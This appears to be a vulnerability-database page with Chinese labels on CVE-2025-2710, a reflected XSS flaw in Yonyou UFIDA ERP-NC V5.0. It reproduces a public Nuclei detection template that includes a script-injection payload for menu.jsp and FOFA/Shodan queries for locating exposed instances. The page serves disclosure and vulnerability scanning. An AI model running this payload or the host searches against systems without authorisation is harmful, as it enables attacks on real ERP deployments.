CVE-2025-2710: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Yonyou UFIDA ERP-NC V5.0 | POC: 已公开

漏洞描述

Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the flag parameter in menu.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.

PoC代码[已公开]

id: CVE-2025-2710

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the flag parameter in menu.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the flag parameter in menu.jsp.
  reference:
    - https://github.com/Hebing123/cve/issues/85
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2710
  classification:
    epss-score: 0.0008
    epss-percentile: 0.24475
    cve-id: CVE-2025-2710
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.jsp"

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "yonyou nc", "name=\"ncapplet")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100afc1eee9aa03abdc74a51902fe8f4d5c699a90899c1b850e06f82bf73c346e1902207128fba48fca7e34b910241e546cd29ee85fdd1ee02ac9c1f291f1e2e1ae4860:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-2710.yaml

相关漏洞推荐